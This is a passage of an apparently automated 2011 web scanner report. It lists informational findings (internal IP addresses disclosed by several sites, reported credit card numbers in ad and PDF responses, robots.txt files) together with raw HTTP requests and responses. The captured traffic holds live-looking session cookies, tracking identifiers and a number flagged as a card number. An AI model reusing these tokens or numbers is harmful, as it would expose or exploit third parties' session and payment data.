Date: Mon, 25 Apr 2011 14:27:12 GMT
Content-Type: application/x-javascript
Content-Length: 3396
Last-Modified: Tue, 23 Dec 2008 15:27:11 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:12 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...
var fw={};var block={};var page={}; var page_load={}; var block_prop={};var g_st={};
var save_key = false;
function f_new(name)
{
this.Modules={};

}
var Catalog = {};
var Catalog_ =
...[SNIP]...
_block = false;//* ............ .......... ...... .............. .......................... ........................
var Move_html="";

var mode;
var g_url_pr = 'my.webalta.ru';
//var g_url_pr = '192.168.140.29';
var g_url_ = 'http://'+g_url_pr+'/public/engine/widget/';
var g_url_cat = 'http://'+g_url_pr+'/public/engine/catalog/';
var g_url_proxy = 'http://'+g_url_pr+'/feed/l.php?url=';
var g_url_xslt =
...[SNIP]...

26.6. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3011c9318%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff27180d43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=270
Expires: Mon, 25 Apr 2011 14:57:09 GMT
Date: Mon, 25 Apr 2011 14:52:39 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.7. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.184

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.184
Vary: Accept-Encoding
Cache-Control: public, max-age=911
Expires: Mon, 25 Apr 2011 13:07:59 GMT
Date: Mon, 25 Apr 2011 12:52:48 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.8. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /rsrc.php/v1/zX/r/i_oIVTKMYsL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:57:45 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.185
Cache-Control: public, max-age=27993760
Expires: Wed, 14 Mar 2012 14:56:08 GMT
Date: Mon, 25 Apr 2011 14:53:28 GMT
Connection: close

.PNG
.
...IHDR..............o&....#IDAT.[c...v.....].....A..\.Y.,..@....\.-. .....IEND.B`.

26.9. http://tools.manageengine.com/forums/me/forum.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.manageengine.com
Path:	/forums/me/forum.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.90

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51202

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>body{}
.forumTitle{float:left;margin-top:-12px;padding-left:10px;font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:22px;t
...[SNIP]...
<a href='http://10.0.0.90:8080/WorkOrder.do?woMode=viewWO&woID=1951' target='_blank'>http://10.0.0.90:8080/WorkOrder.do?woMode=viewWO&woID=1951<\/a>
...[SNIP]...

26.10. http://tools.manageengine.com/forums/security-manager/forum.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.manageengine.com
Path:	/forums/security-manager/forum.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.118.128

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64425

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a style=\"font-style: italic;\" href=\"http://192.168.118.128:6262//store?f=300132-jre-6u23-windows-i586-s.exe$1,\" target=\"_blank\">http://192.168.118.128:6262//store?f=300132-jre-6u23-windows-i586-s.exe$1<\/a>
...[SNIP]...

26.11. https://www.controlscan.com/checkout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/checkout.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.0.15

Request

Response

26.12. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.52.27

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df390c5570%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff6001b114%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

26.13. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.103.81

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3011c9318%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff27180d43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

26.14. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.215.116

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31664749%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff722d66cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

26.15. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.150.41

Request

Response

26.16. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.198.128

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cde351e4%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff28ffd8ef%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/server-security/linux-file
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

27. Credit card numbers disclosed previous next
There are 3 instances of this issue:

http://ad.doubleclick.net/adj/lj.homepage/loggedout
http://ib.adnxs.com/ab
http://www.kronos.com/email/c/agendalcc11-full.pdf

27.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lj.homepage/loggedout

Issue detail

The following credit card number was disclosed in the response:

4456182135956974

Request

GET /adj/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=300x250;pos=r;tile=3;ord=2623414837? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

27.2. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The following credit card number was disclosed in the response:

4456182135956974

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\">
...[SNIP]...

27.3. http://www.kronos.com/email/c/agendalcc11-full.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kronos.com
Path:	/email/c/agendalcc11-full.pdf

Issue detail

The following credit card number was disclosed in the response:

4761941214952

Request

GET /email/c/agendalcc11-full.pdf HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/email/c/agendalcc11-full.pdf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; fcspersistslider1=5; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.10.10.1303738437
Range: bytes=32768-284279
If-Range: Thu, 14 Apr 2011 19:48:09 GMT

Response

HTTP/1.1 206 Partial Content
Cache-Control: max-age=432000
Content-Length: 251512
Content-Type: application/pdf
Content-Location: http://www.kronos.com/email/c/agendalcc11-full.pdf
Content-Range: bytes 32768-284279/284280
Last-Modified: Thu, 14 Apr 2011 19:48:09 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:22:26 GMT

6w.Sn|.c^...[...P.xn.m".>*.6(.Ef.H]...X....'.....]..,-/PSQ.XA....l....a.i.._V.....LZ7y...aK.......w... &.........-QGKF{s.Op...$.;p....)..q^.1.B2:...?8u.....|3e.:_..~...w...k...^.h..4.n*..8..\}S
.|.
...[SNIP]...
< /Type /FontDescriptor /Ascent 952 /CapHeight 644 /Descent -269 /Flags 4
/FontBBox [-476 -194 1214 952] /FontName /SDJQOU+Calibri /ItalicAngle 0 /StemV
0 /AvgWidth 503 /MaxWidth 1288 /XHeight 476 /FontFile2 32 0 R >
...[SNIP]...
< /Type /FontDescriptor /Ascent 952 /CapHeight 644 /Descent -269 /Flags 68
/FontBBox [-476 -194 1214 952] /FontName /EGZQJU+Calibri-Italic /ItalicAngle
-5 /StemV 0 /AvgWidth 502 /MaxWidth 1288 /XHeight 476 /FontFile2 38 0 R >
...[SNIP]...

28. Robots.txt file previous next
There are 60 instances of this issue:

http://945075.r.msn.com/
http://ad.afy11.net/ad
http://ad.doubleclick.net/adj/lj.homepage/loggedout
http://api.facebook.com/restserver.php
http://apnxscm.ac3.msn.com:81/CACMSH.ashx
http://b.voicefive.com/b
http://b2bcontext.ru/services/advertisement/getblock
http://beacon.securestudies.com/scripts/beacon.dll
http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0
http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru
https://checkout.netsuite.com/robots.txt
http://clients1.google.com/complete/search
http://d7.zedo.com/img/bh.gif
http://direct.yandex.ru/
http://forums.manageengine.com/fbw
http://games.mochiads.com/c/g/moon-volley/mvolley.swf
http://goods.adnectar.com/analytics/get_avia_js
http://goods43.adnectar.com/analytics/record_impression
http://googleads.g.doubleclick.net/pagead/ads
http://ideco-software.ru/products/ims/
http://imagesrv.gartner.com/cio/css/main.css
http://img.en25.com/Web/KronosIncorporated/kronos-ga.js
http://map.media6degrees.com/orbserv/aopix
http://maps.google.com/maps
http://mbox5.offermatica.com/m2/netsuite/mbox/standard
http://netsuite-www.baynote.net/baynote/customerstatus2
http://odnoklassniki.ru/
http://partner-support.wiki.zoho.com/
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://pretty.ru/
http://r2.mail.ru/b13057590.swf
http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif
http://rs.mail.ru/d292152.gif
http://s0.2mdn.net/1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf
http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ
http://safebrowsing.clients.google.com/safebrowsing/downloads
http://search.twitter.com/search.json
http://segment-pixel.invitemedia.com/pixel
http://solutions.kronos.com/content/experience2011
http://tengrinews.kz/tag/891/
http://toolbarqueries.clients.google.com/tbproxy/af/query
http://tools.manageengine.com/forums/security-manager/forum.php
http://translate.google.com/translate_a/element.js
http://translate.googleapis.com/translate_a/t
http://widgets.digg.com/buttons/count
http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif
http://www.gartner.com/DisplayDocument
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1072501689/
http://www.igotyourindex.com/igyindex.php
http://www.iveco-ptc.spb.ru/
http://www.livejournal.com/
http://www.manageengine.com/products/security-manager/
https://www.manageengine.com/products/security-manager/index.html
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T
http://www.smpone.com/
http://www.tresware.com/
http://www.trucklist.ru/cars/trucks

28.1. http://945075.r.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://945075.r.msn.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 945075.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Mon, 25 Apr 2011 12:12:16 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

28.2. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:37:55 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /

28.3. http://ad.doubleclick.net/adj/lj.homepage/loggedout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lj.homepage/loggedout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

28.4. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Wed, 25 May 2011 15:17:38 GMT
X-FB-Server: 10.32.31.118
Connection: close
Content-Length: 24

User-agent: *
Disallow:

28.5. http://apnxscm.ac3.msn.com:81/CACMSH.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apnxscm.ac3.msn.com:81
Path:	/CACMSH.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apnxscm.ac3.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:36:35 GMT
Last-Modified: Sat, 02 Apr 2011 00:47:24 GMT
Accept-Ranges: bytes
ETag: "1CBF0CF87F3F600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Mon, 25 Apr 2011 14:36:34 GMT
Connection: close
Content-Length: 70

# Keep all robots out of entire web site
User-agent: *
Disallow: /

28.6. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

28.7. http://b2bcontext.ru/services/advertisement/getblock previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b2bcontext.ru
Path:	/services/advertisement/getblock

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b2bcontext.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:47:21 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 26 Jul 2010 15:06:23 GMT
ETag: "5960d7-2d-48c4bba4eb9c0"
Accept-Ranges: bytes
Content-Length: 45
Vary: Accept-Encoding

User-agent: *
Disallow:
Host: b2bcontext.ru

28.8. http://beacon.securestudies.com/scripts/beacon.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://beacon.securestudies.com
Path:	/scripts/beacon.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

28.9. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.mail.ru
Path:	/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.mail.ru

Response

HTTP/1.1 200 OK
